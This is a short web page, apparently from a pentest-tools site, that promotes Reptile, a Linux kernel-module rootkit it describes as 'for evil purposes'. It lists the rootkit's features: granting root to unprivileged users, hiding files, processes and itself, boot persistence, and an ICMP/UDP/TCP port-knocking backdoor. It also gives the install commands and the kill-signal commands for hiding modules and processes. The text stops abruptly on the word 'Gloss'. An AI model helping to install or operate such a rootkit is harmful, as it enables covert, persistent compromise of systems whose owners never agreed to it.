Pentest Tools
Published on December 14th, 2017 📆 | 2082 Views ⚑
0Reptile: LKM Linux rootkit
iSpeech.org
Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes.
Features
- Give root to unprivileged users
- Hide files and directories
- Hide files contents
- Hide processes
- Hide himself
- Boot persistence
- Heaven’s door – A ICMP/UDP/TCP port-knocking backdoor
- Client to knock on heaven’s door ????
Install
apt-get install linux-headers-$(uname -r)
https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install
Uninstall
kill -50 0
rmmod reptile_mod
./install.sh uninstall
Usage
Binaries will be copied to /reptile folder, that will be hidden by Reptile.
Getting root privileges
Hiding
- Hide/unhide reptile module: kill -50 0
- Hide/unhide process: kill -49 <PID>
- Hide files contents: all content between the tags will be hidden
Example:
#<reptile>
content to hide
#</reptile>
Knocking on heaven’s door
Heaven’s door is an ICMP/UDP/TCP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:
Gloss